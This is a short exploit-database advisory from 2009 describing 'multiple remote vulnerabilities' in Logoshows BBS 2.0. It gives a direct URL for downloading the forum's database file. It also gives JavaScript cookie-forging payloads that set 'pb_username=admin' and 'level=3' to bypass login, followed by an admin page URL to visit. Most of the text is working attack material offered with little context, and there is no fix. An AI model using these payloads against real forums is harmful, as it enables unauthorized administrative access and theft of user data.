Logoshows BBS 2.0 (DD-ICH) Multiple Remote Vulnerabilities
2009-08-07 21:35:47Logoshows BBS 2.0 DD
ZoRLu
yildirimordulari.com - z0rlu.blogspot.com - turkguvenligi.info
ref: 9389
vuln:
http://www.logoshows.com/bbs/database/globepersonnel.mdb
Logoshows BBS 2.0 ICH
yildirimordulari.com - z0rlu.blogspot.com - turkguvenligi.info
ref: 9389
demo:
http://www.logoshows.com/bbs/globepersonnel_login.asp
exploit:
javascript:document.cookie = "pb%5Fusername=admin; path=/";
exploit:
javascript:document.cookie = "level=3; path=/";
after you go here:
after go here:
http://www.logoshows.com/bbs/globepersonnel_reply.asp?id=6&topic=6&recordnum=0
thanks: str0ke and all friends
#
Fixes
No fixesIn order to submit a new fix you need to be registered.

